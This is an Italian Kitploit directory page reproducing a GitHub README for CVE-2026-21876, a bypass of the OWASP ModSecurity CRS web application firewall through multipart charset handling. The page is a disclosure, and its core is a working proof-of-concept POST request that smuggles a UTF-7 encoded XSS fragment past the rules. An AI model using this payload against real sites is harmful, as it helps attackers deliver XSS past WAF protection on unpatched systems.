Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-21876 — Minimal PoC e container Docker che dimostrano un bypass WAF in OWASP ModSecurity CRS tramite la gestione del charset multipart, che porta alla consegna di payload XSS. | Kitploit
Strumenti/GitHubGitHub/mefhika120/cve-2026-21876
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebBypass WAFPenetration Testing
GitHubmefhika120/cve-2026-21876

CVE-2026-21876

Minimal PoC e container Docker che dimostrano un bypass WAF in OWASP ModSecurity CRS tramite la gestione del charset multipart, che porta alla consegna di payload XSS.

Vedi Repository
58 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-21876 (Bypass WAF OWASP CRS)

Container docker CVE-2026-21876 + PoC minimale.

Vorrei ringraziare separatamente @airween e @fzipi per la loro rapida risposta! La correzione della vulnerabilità è stata pronta in pochissimo tempo.

PoC

root@kitploit:~
POST /submit HTTP/1.1
Host: localhost
User-Agent: curl/8.17.0
Accept: */*
Origin: https://example.com
Content-Length: 367
Content-Type: multipart/form-data; boundary=------------------------cmOi6twNhVJDu76bOwDTVz

--------------------------cmOi6twNhVJDu76bOwDTVz
Content-Disposition: form-data; name="username"
Content-Type: text/plain; charset=utf-7

+ADw-img+ACA-src+AD0-x+AD4-
--------------------------cmOi6twNhVJDu76bOwDTVz
Content-Disposition: form-data; name="dummy"
Content-Type: text/plain; charset=utf-8

dummy
--------------------------cmOi6twNhVJDu76bOwDTVz--

Il valore di username non viene controllato per i caratteri non inclusi nella whitelist, il che porta al bypass del WAF.

Demo del bypass

изображение

Lo stesso payload viene bloccato qui

изображение

Riferimenti

  • Advisory di sicurezza GitHub
  • Articolo del blog sulla procedura OWASP CRS
  • La mia storia di scoperta su Medium
Scarica lo strumento